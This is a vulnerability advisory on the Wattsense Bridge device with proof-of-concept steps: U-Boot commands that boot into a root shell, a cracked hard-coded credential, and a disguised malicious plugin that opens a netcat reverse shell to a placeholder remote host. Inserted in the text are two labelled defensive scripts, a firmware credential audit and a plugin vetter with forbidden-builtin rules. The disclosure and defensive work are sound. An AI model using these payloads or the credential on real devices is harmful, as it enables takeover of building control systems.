Multiple vulnerabilities in Wattsense Bridge

Title: Multiple vulnerabilities

Product: Wattsense - Wattsense Bridge

Vulnerable Version: Hardware Revision: WSG-EU-SC-14-00, 20230801 | Firmware Revision: Wattsense (Wattsense minimal) 5.7.2 ws-box-v1.3

Fixed Version: Issues 2 & 3: >= 6.4.1, Issue 4: >= 6.1.0

CVE Number: CVE-2025-26408, CVE-2025-26409, CVE-2025-26410, CVE-2025-26411

Impact: high

Found: 20.11.2023

By: Constantin Schieber-Knöbl, Stefan Schweighofer, Steffen Robertz (Office Vienna) | SEC Consult Vulnerability Lab

Management summary

The Wattsense Bridge device was affected by multiple vulnerabilities. The issues affected both the hardware of the device and the firmware running on it. It was possible to access a debug interface (JTAG) of the device, as well as the bootloader over a serial interface. On the firmware side, hard-coded credentials were found, and an authenticated remote code execution vulnerability allowed an attacker to take over a single device with the highest privileges (root).

Vendor description

"Buildings in the EU are responsible for 40% of our energy consumption and 36% of greenhouse gas emissions. At Wattsense, we believe that to reduce those hard-hitting numbers and positively change our environment, we must bring technology, mostly reserved for new or large facilities, to smaller and medium-sized buildings. Wattsense gives property owners the power to make their buildings more sustainable."

Source: https://www.wattsense.com/about

Business recommendation

The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.

Vulnerability overview/description

If any of the vulnerabilities 1-4 is successfully exploited, the following impact arises. An attacker with physical access to the device can control the measurements and switching behavior of the device, e.g. by installing a backdoor for later remote access. Since the Wattsense Bridge can trigger actions on physical devices, safety violations and physical damage are possible.

1) Access to JTAG Interface (CVE-2025-26408)

The JTAG interface can be accessed with physical access to the PCB. After connecting to the interface, full access to the device is possible. This enables an attacker to extract information, modify and debug the device's firmware.

2) Access to Bootloader and Shell Over Serial Interface (CVE-2025-26409)

A serial interface can be accessed with physical access to the PCB. After connecting to the interface, access to the bootloader is possible, as well as a Linux login prompt. The bootloader access can be used to gain a root shell on the device.

3) Weak Hardcoded Credentials (CVE-2025-26410)

The firmware of all devices contains the same hardcoded user and root credentials. The user password can be easily recovered via password cracking attempts. The recovered credentials can be used to log into the device via the login shell that is exposed by the serial interface, described in the previous vulnerability "2) Access to Bootloader and Shell Over Serial Interface".

4) Authenticated Arbitrary Python File Upload via Plugin Manager (CVE-2025-26411)

An authenticated attacker is able to use the Plugin Manager of the web interface to upload malicious Python files to the device. This enables an attacker to gain remote root access to the device. To conduct this attack, an attacker needs a valid user account on the Wattsense web interface in which valid Wattsense Bridge devices are configured.

Proof of concept

1) Access to JTAG Interface (CVE-2025-26408)

The unlocked JTAG interface is exposed on the stamp hole expansion interface of the system on module (SoM) processing PCB (Myirtech MYC-Y6ULX) and is documented in the related datasheet. By soldering wires to the appropriate pins (TMS, TCK, TDI, TDO, TRST) on the PCB, the JTAG port becomes accessible with an adaptor. The MOD pin can be left unconnected; it enables the software debug features when it is not pulled high. A Segger J-Link PRO JTAG adaptor was used to connect. The debugging software OpenOCD can then be used to read and manipulate the firmware. This grants an attacker with physical access to the device full control of the device.

Figure 1: Access to JTAG interface

2) Access to Bootloader and Shell Over Serial Interface (CVE-2025-26409)

The serial interface on the Wattsense Bridge can be accessed by connecting to the following pin header (GND, TX, RX) that is present on the PCB:

--------|
 +-+    | 
 |o|GND |
 |o|RX  |
 |o|TX  |
 +-+    |
       Micro USB Port
        | 

Figure 2: Access to bootloader over serial interface pin headers (GND, TX, RX)

A serial-to-USB adaptor (e.g., an FT232-based board) can be used to access the serial interface. The following settings are necessary in any terminal program:

  • Voltage: 3.3V
  • Speed: 115200 Baud
  • Framing: 8 data bits, no parity, 1 stop bit (8N1)

After a successful connection, the bootloader is available by pressing any key at startup. With the resulting U-Boot command shell, the environment variables of the boot process can be modified. This allows an attacker to launch a root shell during the boot process:

=> setenv mmcargs "setenv bootargs console=${console},${baudrate} root=${mmcpath} ${mmcroot} ${raucslot} init=/bin/sh"
=> boot

In the resulting root shell, an attacker can remount the root file system read-write:

# mount -o remount,rw /

At this point an attacker can, for example, backdoor the device with a new root user by appending a line to the /etc/passwd file. The boot environment then needs to be reset to its previous state. After restarting the device, a Linux login prompt is presented, where the newly created backdoor account can be used to log in to the system.

3) Weak Hardcoded Credentials (CVE-2025-26410)

The firmware on all devices includes the same hardcoded user and root password hash. The user password hash can easily be cracked with the password cracking tool john:

$ john shadow
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cracked 1 password hash
No password hashes left to crack (see FAQ)

$ john --show shadow
wattsense:wattsense::0:99999:7:::
1 password hash cracked, 0 left

The user's password can then be used, for example, to log into the system as a normal user via the login prompt exposed by the vulnerability described in "2) Access to Bootloader and Shell Over Serial Interface".
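The weakness in vulnerability 3 has two parts that can be checked without cracking anything: the same password hash is shipped on every device (a device-wide secret rather than a per-device one), and the accounts carrying those hashes have an interactive login shell. The following audit script is an added example and is not part of the SEC Consult advisory or of Wattsense's firmware; it parses /etc/shadow and /etc/passwd content extracted from firmware images and flags both conditions. All sample data is constructed, and the hash strings are placeholders rather than values from the device. Actual password recovery is what john does in the advisory above; this script only finds the candidates worth looking at.

```python
"""Audit shadow/passwd data from firmware images for hard-coded,
device-wide credentials. Added example; not the advisory's or the
vendor's code. Sample data is constructed."""

from collections import defaultdict

# Shells that give an interactive session after a successful password login.
INTERACTIVE_SHELLS = {"/bin/sh", "/bin/bash", "/bin/ash", "/bin/dash", "/bin/zsh"}


def parse_shadow(text):
    """Return {user: hash_field} for every non-empty, non-comment shadow line."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            entries[fields[0]] = fields[1]
    return entries


def parse_passwd_shells(text):
    """Return {user: login_shell} from passwd lines (7 colon-separated fields)."""
    shells = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 7:
            shells[fields[0]] = fields[6]
    return shells


def audit_image(shadow_text, passwd_text):
    """Flag accounts on one image that can log in with a password."""
    findings = []
    shells = parse_passwd_shells(passwd_text)
    for user, h in parse_shadow(shadow_text).items():
        shell = shells.get(user, "")
        if h == "":
            findings.append((user, "empty password field (no password required)"))
        elif h[0] in "!*":
            continue  # locked account: password login disabled
        elif shell in INTERACTIVE_SHELLS:
            findings.append((user, f"password login enabled with interactive shell {shell}"))
    return findings


def shared_hashes(images):
    """images: {image_name: shadow_text}. Return {(user, hash): [image names]}
    for every usable hash that appears in more than one image. A hash that
    repeats across images is baked into the firmware, not generated per device."""
    seen = defaultdict(list)
    for name, text in images.items():
        for user, h in parse_shadow(text).items():
            if h and h[0] not in "!*":
                seen[(user, h)].append(name)
    return {key: names for key, names in seen.items() if len(names) > 1}


# Constructed sample data: images A and B ship identical hashes (the pattern
# described in vulnerability 3); image C has a locked root and its own hash.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/sh
user:x:1000:1000::/home/user:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
"""
SAMPLE_SHADOW_A = """root:$6$PLACEHOLDERSALT$PLACEHOLDERHASHA:19700:0:99999:7:::
user:$6$PLACEHOLDERSALT$PLACEHOLDERHASHB:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
"""
SAMPLE_SHADOW_B = SAMPLE_SHADOW_A  # every device ships the same shadow file
SAMPLE_SHADOW_C = """root:!:19700:0:99999:7:::
user:$6$OTHERSALT$OTHERHASH:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
"""

if __name__ == "__main__":
    for name, shadow in (("img_a", SAMPLE_SHADOW_A), ("img_c", SAMPLE_SHADOW_C)):
        for user, reason in audit_image(shadow, SAMPLE_PASSWD):
            print(f"{name}: {user}: {reason}")
    for (user, h), names in shared_hashes(
        {"img_a": SAMPLE_SHADOW_A, "img_b": SAMPLE_SHADOW_B, "img_c": SAMPLE_SHADOW_C}
    ).items():
        print(f"hard-coded hash for '{user}' shared by {names}")
```

Run it against the shadow and passwd files pulled from several firmware builds or devices; an account that appears in `shared_hashes` and in `audit_image` with an interactive shell is exactly the situation the advisory describes, and is the one to hand to a cracker or, better, to remove or lock in the image.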

4) Authenticated Arbitrary Python File Upload via Plugin Manager (CVE-2025-26411)

The "Plugin Manager" feature of the Wattsense web interface allows an authenticated attacker to upload malicious Python files to the Wattsense Bridge. With the following Python code it is possible to gain a remote root shell on a targeted device:

from wattsense.azote import Plugin
import os

class WriteSetpoint(Plugin):
    def __init__(self):
        # Executed as root when the plugin is loaded by the device
        os.system("nc -e /bin/sh <remote_host> <remote_port>")
        super().__init__()

    def callback(self, variable, value, timestamp):
        # Ordinary plugin behaviour, kept so the upload looks legitimate
        if variable == 'ERS_EYE_PRESENCE' and value == 1:
            self.publish('MCLIMAT_SETPOINT', "0E18:1")
        else:
            self.publish('MCLIMAT_SETPOINT', "0E12:1")
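The root cause of vulnerability 4 is that the Plugin Manager runs whatever Python is uploaded, as root, with the full standard library available. As an added example (not Wattsense's code; the advisory documents nothing of the plugin API beyond `wattsense.azote.Plugin`, `callback` and `publish`), the vetting check below parses a candidate plugin with `ast` before it is accepted and rejects imports outside a constructed allow-list as well as calls to builtins that load code at runtime. It flags the `import os` of the plugin above. The allow-list contents and the sample plugins are assumptions made for the example.

```python
"""Static vetting of an uploaded plugin before it is accepted.
Added example; not part of the advisory or of Wattsense's code.
Allow-list and sample plugins are constructed for this example."""

import ast

# Modules a plugin may import; everything else is rejected. Constructed list.
ALLOWED_MODULES = {"wattsense.azote", "math", "json", "datetime"}
# Builtins that let a plugin reach code or modules the import check never sees.
FORBIDDEN_BUILTINS = {"exec", "eval", "compile", "__import__", "open"}


class PluginVetter(ast.NodeVisitor):
    """Collects human-readable violations while walking the plugin's AST."""

    def __init__(self):
        self.violations = []

    def visit_Import(self, node):
        for alias in node.names:
            if alias.name not in ALLOWED_MODULES:
                self.violations.append(f"line {node.lineno}: import of '{alias.name}' not allowed")
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        module = node.module or ""
        # node.level > 0 means a relative import, which an uploaded plugin has no business using
        if node.level or module not in ALLOWED_MODULES:
            self.violations.append(f"line {node.lineno}: import from '{module}' not allowed")
        self.generic_visit(node)

    def visit_Call(self, node):
        if isinstance(node.func, ast.Name) and node.func.id in FORBIDDEN_BUILTINS:
            self.violations.append(f"line {node.lineno}: call to builtin '{node.func.id}' not allowed")
        self.generic_visit(node)


def vet_plugin(source):
    """Return a list of violations; an empty list means the source passed the static check."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"syntax error: {exc.msg} (line {exc.lineno})"]
    vetter = PluginVetter()
    vetter.visit(tree)
    return vetter.violations


# Constructed sample plugins. The first mirrors the structure of the advisory's
# upload with the payload replaced by a placeholder string.
MALICIOUS_PLUGIN = """from wattsense.azote import Plugin
import os

class WriteSetpoint(Plugin):
    def __init__(self):
        os.system("<any shell command>")
        super().__init__()
"""

BENIGN_PLUGIN = """from wattsense.azote import Plugin

class WriteSetpoint(Plugin):
    def callback(self, variable, value, timestamp):
        if variable == 'ERS_EYE_PRESENCE' and value == 1:
            self.publish('MCLIMAT_SETPOINT', "0E18:1")
"""

# Avoids the import statement entirely; caught by the builtin check instead.
EVASIVE_PLUGIN = """from wattsense.azote import Plugin

class P(Plugin):
    def __init__(self):
        mod = __import__("o" + "s")
"""

if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_PLUGIN), ("benign", BENIGN_PLUGIN), ("evasive", EVASIVE_PLUGIN)):
        print(name, vet_plugin(src) or "OK")
```

A check like this is a triage aid, not a security boundary: Python offers enough reflection (attribute access on builtins, `getattr`, pickle, and so on) that a determined upload can get past any static allow-list. The durable fix is to not run uploaded plugins as root at all, i.e. to execute them under an unprivileged account in a separate process or container and to accept only plugins signed by the operator, with the static vetting retained as an early, cheap reject.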

Vulnerable / tested versions

The following version, the latest available at the time of the test, has been tested:

  • Wattsense Bridge
    • Hardware Revision: WSG-EU-SC-14-00, 20230801
    • Firmware Revision: Wattsense (Wattsense minimal) 5.7.2 ws-box-v1.3

Vendor contact timeline

2024-05-15 Contacting vendor through support@wattsense.com
2024-05-15 The Wattsense team responded within one hour and the advisory was provided to them thereafter.
2024-05-21 The Wattsense team gave an update that vulnerabilities 3 and 4 are already fixed and that they are working on resolving the other ones (1-2) as well. Issue 5 will be worked on afterwards, once access to the device is further blocked.
2024-05-22 Asking how to proceed with issue 5, if Wattsense is going to fix it or the modem supplier.
2024-05-27 Vendor: no communication with the supplier yet, current focus is blocking access to the system. We offer to contact the supplier, Wattsense will do it in parallel as well. Removing issue 5 from this advisory, creating a separate one.
2024-06-18 Contacting Wattsense regarding a direct contact for the supplier as they are unresponsive.
2024-06-25 Vendor: only a distributor contact is available to them, they will look into it. Furthermore, issue 2 is fixed now.
2024-07-12 Vendor: The devices will receive updates starting from 2024-07-15. As some devices are not always connected, the vendor estimates that most devices should be updated by the end of September 2024.
2024-11-13 Asking for more information about affected firmware versions and how to proceed regarding the advisory release. No response.
2024-12-10 Asking for a status update.
2024-12-10 Vendor: Issue 1 is in the backlog. Issue 2 and issue 3 are fixed in version >= 6.4.1.
2024-12-16 Asking regarding the CVE reservation for the described issues and the planned advisory, scheduling release for mid-January. No response.
2025-02-04 Informing vendor that we will assign CVE and release the advisory shortly.
2025-02-11 Coordinated release of advisory.

Solution

The vendor communicated during initial contact that the following vulnerabilities were already fixed or being worked on:

  • Vulnerability 1: Vendor: Requires more attacker knowledge and higher physical access. The device is meant to be installed at a restricted access physical location. The issue will be put in the backlog of the Wattsense team.
  • Vulnerability 2: fixed in recent FW versions BSP >= 6.4.1
  • Vulnerability 3: User does not exist anymore in BSP >= 6.4.1
  • Vulnerability 4: fixed in recent FW versions BSP >= 6.1.0

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/


EOF Steffen Robertz, Constantin Schieber-Knoebl, Stefan Viehboeck / @2025
